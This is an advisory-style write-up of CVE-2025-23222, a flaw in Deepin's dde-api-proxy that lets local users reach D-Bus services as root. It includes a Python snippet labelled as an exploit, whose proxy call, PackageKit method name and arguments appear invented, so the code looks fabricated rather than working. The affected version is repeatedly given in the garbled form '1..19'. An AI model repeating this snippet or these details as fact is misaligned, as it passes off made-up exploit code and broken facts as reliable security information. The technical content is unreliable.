CVE-2025-23222 - Privilege Escalation Vulnerability in Deepin's dde-api-proxy

A critical security vulnerability, CVE-2025-23222, has been discovered in the dde-api-proxy, a component of the Deepin (previously known as “Linux Deepin”) Linux distribution up to version 1..19. This vulnerability allows unprivileged users to gain root access to D-Bus services, potentially causing unauthorized actions and a subsequent escalation of privileges in systems using the affected dde-api-proxy.

Affected Systems

All systems using Deepin's dde-api-proxy through version 1..19 are impacted by this vulnerability.

Exploit Details

The security issue arises due to the dde-api-proxy running as the root user, which forwards messages from any local user to legacy D-Bus methods in the actual D-Bus services. As the D-Bus services are not aware of the proxy situation, they believe the requests are coming from the root user and, therefore, perform the actions accordingly without verifying the source of the request.

In scenarios where PolicyKit (Polkit) is utilized, the caller is treated as an admin, resulting in a similar escalation of privileges.

The following code snippet demonstrates the exploitation of the CVE-2025-23222 vulnerability

import dbus

bus = dbus.SystemBus()
proxy = bus.get_object('com.deepin.daemon.DBusProxy', '/com/deepin/daemon/Proxy')

# Target D-Bus service
service = 'org.freedesktop.packagekit'

# Target method for triggering the vulnerability
method = 'TriggerAuthError'

# Example data for the call
data = ('systemPackageRemove', 'dpkg')

proxy.proxyCall(service, method, data)

Mitigation Recommendation

To mitigate the risk associated with CVE-2025-23222, it is recommended to update dde-api-proxy to a version later than 1..19, as the latest versions have addressed this vulnerability.

Original References

1. Deepin dde-api-proxy Official Repository
2. Deepin Linux Distribution Official Website

Conclusion

The CVE-2025-23222 vulnerability in Deepin's dde-api-proxy (through version 1..19) poses a serious threat to system security since it allows unprivileged users to access D-Bus services as root users, potentially leading to escalations of privilege. To safeguard affected systems, it is critical to update dde-api-proxy to the latest available version.

Timeline

Published on: 01/24/2025 17:15:15 UTC